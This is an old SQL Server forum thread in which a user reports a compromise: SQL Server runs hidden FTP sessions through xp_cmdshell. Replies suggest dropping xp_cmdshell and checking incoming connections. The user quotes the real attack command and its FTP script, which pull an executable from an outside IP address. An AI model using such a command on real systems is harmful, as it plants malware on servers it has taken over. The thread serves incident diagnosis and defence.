April 29, 2005 at 3:34 am
Hi,
Since I installed a firewall on my machine, it regularly detects unexpected ftp sessions.
Thanks to a process explorer, I remarked that ftp is launched from a (hidden) cmd.exe, itself lauched by
sql.exe (for your info, the ftp command line is : "ftp -n -s:???.txt" where ???.txt is a textfile in \system32\ ).
In SQL Enterprise Manager, I see one suspect process. Process details :
EXEC master..xp_cmdshell 'echo open 81.244.123.174 6220 >> ntp.txt &echo user ntpbxu ntpbxu >> ntp.txt &echo get SCardClnt.exe >> ntp.txt &echo quit >> ntp.txt &ftp -n -s:ntp.txt
'
What SQL subsystem is able to launch such a process? a stored procedure? a trigger? (fyi, SQLAgent is not running). How can I prevent this to occur? Do I have to reinstall SQL Server?
Thank you for your help,
François
Note - contents of the textfile in \system32\:
open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit
April 30, 2005 at 9:06 am
Just about anything that can get to the xp_CmdShell and, that would be a lot of things... that's why a lot of DBA's disable it. I don't know how to disable it but I'm sure that someone on this forum does.
--Jeff Moden
Change is inevitable... Change for the better is not.
May 3, 2005 at 3:27 am
looks like someone is trying to download a file to your server.
use master exec sp_dropextendedproc 'xp_cmdshell'
should drop the command shell access from SQL server. I'd very carefully check to see where incoming connections to sql server are originating from. If someone is executing the command you posted, there's a lot of other things that same person could be doing.
Julian Kuiters
juliankuiters.id.au
Viewing 3 posts - 1 through 2 (of 2 total)
You must be logged in to reply to this topic. Login to reply